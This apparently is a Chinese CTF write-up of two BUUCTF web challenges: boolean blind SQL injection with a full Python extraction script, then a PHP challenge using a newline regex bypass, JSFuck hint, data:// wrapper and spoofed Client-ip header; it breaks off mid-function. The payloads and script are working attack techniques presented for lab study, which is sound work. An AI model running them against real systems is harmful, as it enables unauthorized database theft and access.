[WUSTCTF2020]颜值成绩查询
原始信息
只有一个网页查询窗口,对应URL展示的信息如下:
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=1
return: Hi admin, your score is: 100
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=-1
return:student number not exists.
其余信息扫不出来。
解题
无法对ID进行普通的SQL注入,因为这个有数值验证。
如果是数据库内查询这个句子会变成啥?
尝试使用SQL数据库的if语句进行查询:
布尔注入,使用if(a,b,c)辅助实现。
如果a为true,则返回b
如果a为false,返回c
简单的理解了什么是if语句后,尝试使用这个句子进行访问:
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1>0),1,-1)
return: Hi admin, your score is: 100
GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1<0),1,-1)
return:student number not exists.
既然能通过布尔状态返回两种有特殊特征的字符串,那么可以尝试进行 布尔注入 :
# 以下面这句句子为基础,我们只需要替换一个地方的字符串即可:
# 大括号的位置是我们要换上的内容
## 第一部分句子:
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum={}
## 第二部分句子:这个就是我们要修改的句子,或者注入的句子
## {0}是注入的句子,{1}是截取的字符串的起始位置,{2}是ascii字符串的十进制值
## 我们只需要插入到{0}的位置即可。{1}和{2}是后面爆破用的,这里暂时省略
## ord:将对应字符转为ascii码的十进制数
## substring(x,1,1):将字符串x从第1位开始截取1位。
if((ord(substring({0},{1},1))={2}),1,-1)
在写布尔注入前,先提一嘴SQL注入的流程:
SQL注入的流程大概分为:爆库 => 爆表 => 爆表字段 => 爆字段值
作为个人,博主习惯的是直接获取一列的内容直接进行展出
针对{0}位置的语句插入进行布尔注入:
# 爆库
{0} = (database())
## 合并为完整的一句:(假设当前爆破的是数据库名的第二个字符)
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum=if((ord(substring((database()),2,1))=97),1,-1)
## 仔细观察这句就能看出大概构造流程的最终结果了
## 下面仅描述{0}插入的值
# 经过查询,爆出的列数据库名字为:ctf
# 爆表
{0} = (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
# 查出的表名:'flag,score'
# 爆字段(两个表,每个表分开爆)
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="score"))
# 爆出的结果是:['flag,value', 'id,name,score']
# 爆字段值(当前仅选择flag表的value列)
{0} = (select(group_concat(value))from(ctf.flag))
# 这个查出来直接就是flag了。
为了方便爆破,自己写了个脚本进行辅助。不过因为不是多线程,爆破速度比较缓慢……
# coding=utf8
import requests, time
# tqdm,进度条库
from tqdm import tqdm, tnrange
## 测试布尔注入
def bool_cs_request(url, get_vals, code):
urls = url + '?' + get_vals
def get_status(value):
"""
攻击包内容判断器
:param value: 传入html包内容
:return: 检测状态的布尔值
"""
if "student number not exists" not in value.text and "Hi admin, your score is: 100" in value.text:
return True
else:
return False
def get_val(value, urls):
"""
布尔爆破器
:param value:爆破的SQL语句
:param urls: 爆破的URL
:return: 爆破后的字符串
唯一弊端:太慢了,没有达到多线程攻击
"""
data = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
}
name_val = ''
all_sql = 'if((ord(substring({0},{1},1))={2}),1,-1)'
get_database_name_sql = value
for i in range(1, 100000):
lin_val = name_val
for ascii_one in tqdm(list, desc='单字符攻击进度', unit='个'):
val = requests.get(urls.format(all_sql.format(get_database_name_sql, i, ascii_one)), headers=data)
time.sleep(0.1)
if get_status(val):
name_val += chr(ascii_one)
print()
print(name_val)
break
if lin_val == name_val:
break
return name_val
# 生成ascii码表
# ascii表数据已经优化,以达到提高扫描速度的目的
def n_to_l(num_start, num_end):
lists = []
for i in range(num_start, num_end):
lists.append(i)
return lists
l ,ls= n_to_l(97, 122) + n_to_l(65, 90) + n_to_l(48, 58) + [95, 123, 125, 44, 45, 46] + n_to_l(32, 43)[::-1],[]
for i in range(32, 127):
if i not in l:
ls.append(i)
list = l+ls[::-1]
# 爆库名
database_sql = 'database()'
database_name = get_val(database_sql, urls)
# print('数据库名:' + database_name)
# 爆表
table_sql = "(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))"
table_name = get_val(table_sql, urls)
table_list = []
flag = 0
# 分割获取的表名存入列表当中
if ',' in table_name:
table_list = table_name.split(',')
flag = 1
# 爆列/字段
## 存储每个表对应的字段
l_list = []
if flag == 1:
for name in table_list:
l_sql = '(select(group_concat(column_name))from(information_schema.columns)where(table_name="{}"))'.format(
name)
l_list.append(get_val(l_sql, urls))
l_list = ['flag,value', 'id,na']
## 分割每个表字段的值
all_field = [i.split(',') for i in l_list]
# 爆破值
find_num = 0
field_num = 0
try:
print('库名:',database_name)
print('只能输入数字,不能输入其它。')
print('表名:', table_list)
print('字段:', all_field)
control_table = input('请输入要控制的查那些表(注意!只能选择一张表进行查询!):').strip()
control_field = input('请输入要控制的表对应的字段有那些(以0为初始值选择表对应的字段,一次性只能选择一个字段):').strip()
find_num += int(control_table)
field_num += int(control_field)
except:
field_num = 0
print('你的输入有误!默认只查询第一张表!')
# 根据输入选择的表和字段值进行查询,防止出现遍历的情况
if (find_num < len(table_list) and find_num >= 0):
if field_num >= 0 and field_num <len(all_field[find_num]):
# 生成SQL语句
feild_val = '(select(group_concat({}))from({}.{}))'.format(all_field[find_num][field_num], database_name,
table_list[find_num])
print(get_val(feild_val, urls))
else:
print('你正在查询一个不存在的字段……')
else:
print('你正在查询一个不存在的表……')
if __name__ == '__main__':
# url = 'http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/'
url = input('请输入你的URL(形如http://xxx.xxx.com:81/):')
get_parameters = 'stunum={}'
bool_cs_request(url, get_parameters, code=1)
如果要使用脚本,请记得导入对应的包。
为了让过程有趣写,加入了进度条`(∩_∩)′
执行结果消耗的时间这里先给你提个醒,会超过靶场限定的1h,做好续时间的准备吧。
总结
- SQL注入–布尔注入
- mysql的if语句
- Python脚本
[MRCTF2020]套娃
原始信息
很少,但是有源代码信息提示
<!--
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
!-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hello BUPTers</title>
</head>
<body>
<h1>Welcome!</h1>
<span>这只不过是个小测试区,啥都没有,还请各位多多包涵!</span>
<span>made by crispr</span>
<br></br>
<br></br>
<div>
<img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1583738587360&di=ba2d04cc2ba8603ccaab3d9673976d76&imgtype=0&src=http%3A%2F%2Fimgsrc.baidu.com%2Fforum%2Fw%3D580%2Fsign%3D64c278455f6034a829e2b889fb1249d9%2F46c3bf12c8fcc3ce3e1a38779145d688d63f20eb.jpg" style="width:1500px;height:500px;">
</div>
</body>
</html>
解题
一层
截取源代码进行分析
$query = $_SERVER['QUERY_STRING'];
# php特性,什么东西会转化为下划线
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
# preg_match('/^23333$/ =>前后匹配的正则表达式,使用换行绕过
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
尝试解开参数的下划线问题后,直接写参数:
get: ?b u p t=23333%0a
<!--
%0a是换行
bupt间的空格是控制起在服务端获取的变量名变成b_u_p_t
传参后得到信息:
-->
return: FLAG is in secrettw.php
php字符串解析机制点我查看,不过貌似版本越高解析机制越严谨。
二层
跳转到secrettw.php访问的时候得到下面信息:
Flag is here~But how to get it?Local access only!
Sorry,you don't have permission! Your ip is :sorry,this way is banned!
Flag来了~但是怎么获取呢?仅限本地访问!
抱歉,您没有权限! 您的IP是:抱歉,此方式已被禁止! (机翻)
本地访问的话,意思就是本地IP爆破了。
翻了下题目源代码的时候,发现其中还是有一个信息:
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])
原本需要专门找个工具解码的,但是后面了解了下使用console.log的JS语法输出即可。
当然,也可以使用这个JSFuck网站解码.
解码时会弹出下面这段文本:
post me Merak
post传参,使用Merak:
post: Merak=me
得到源码
三层–源码分析
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
# 解码函数
function change($v){
# base64解码
$v = base64_decode($v);
$re = '';
# 取出每个字符对应的十进制数,按顺序加上$i的增量
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
# 一个外部php引入的解决IP的函数
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
# 鉴定IP地址是否有误,再通过file_get_contents鉴定状态?
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
# 实打实的文件内容读取
echo file_get_contents(change($_GET['file'])); }
?>
这里有一点倒是不得不说:第一个接触file_get_contentsh函数的时get的 ‘2333’ 参数。
file_get_contents($_GET['2333']) === 'todat is a happy day' )
# 意思是核对文件信息是不是 “todat is a happy day”
# 能直接传入文件信息的协议属data莫属了
?2333=data://text,plain,todat is a happy day
暂时解决掉一个参数。
还有一个,就是那个IP地址的爆破。
# 放在BP测试器爆破一下就行。
# 爆破的结果是这个http数据头
Client-ip : 127.0.0.1
接下来剩下一个读文件的get参数。
上面那个函数正好加密了get参数再拿值,这里需要先反写:
function unchange($v){
$re = '';
